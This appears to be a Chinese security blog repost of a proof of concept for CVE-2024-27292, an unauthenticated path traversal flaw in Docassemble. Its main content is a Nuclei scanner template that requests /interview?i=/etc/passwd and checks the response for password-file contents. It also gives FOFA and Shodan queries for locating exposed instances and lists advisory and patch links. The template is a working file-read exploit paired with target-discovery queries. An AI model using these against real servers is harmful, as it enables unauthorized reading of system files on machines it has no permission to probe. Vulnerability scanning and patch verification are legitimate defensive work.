CVE-2024-27292 POC

admin 2024年7月8日08:24:39评论23 views字数 1337阅读4分27秒阅读模式

Docassemble任意文件读取漏洞(CVE-2024-27292)

Docassemble V1.4.96 未经身份验证的路径遍历

fofa

icon_hash="-575790689"

poc

id: CVE-2024-27292

info:
name:Docassemble-LocalFileInclusion
author:johnk3r
severity:high
description:|
    Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
reference:
-https://tantosec.com/blog/docassemble/
-https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
-https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
classification:
cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score:7.5
cve-id:CVE-2024-27292
cwe-id:CWE-706
epss-score:0.00043
epss-percentile:0.0866
metadata:
verified:true
max-request:1
shodan-query:http.title:"docassemble"
fofa-query:icon_hash="-575790689"
tags:cve,cve2024,docassemble,lfi

http:
-method:GET
path:
-"{{BaseURL}}/interview?i=/etc/passwd"

matchers-condition:and
matchers:
-type:regex
regex:
-"root:.*:0:0:"

-type:status
status:
- 501
CVE-2024-27292 POC
image-20240705163642789

漏洞来源

  • • https://github.com/projectdiscovery/nuclei-templates/pull/10169/files

  • • https://github.com/th3gokul/CVE-2024-27292

原文始发于微信公众号(HACK之道):CVE-2024-27292 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月8日08:24:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-27292 POChttp://cn-sec.com/archives/2928406.html

发表评论

匿名网友 填写信息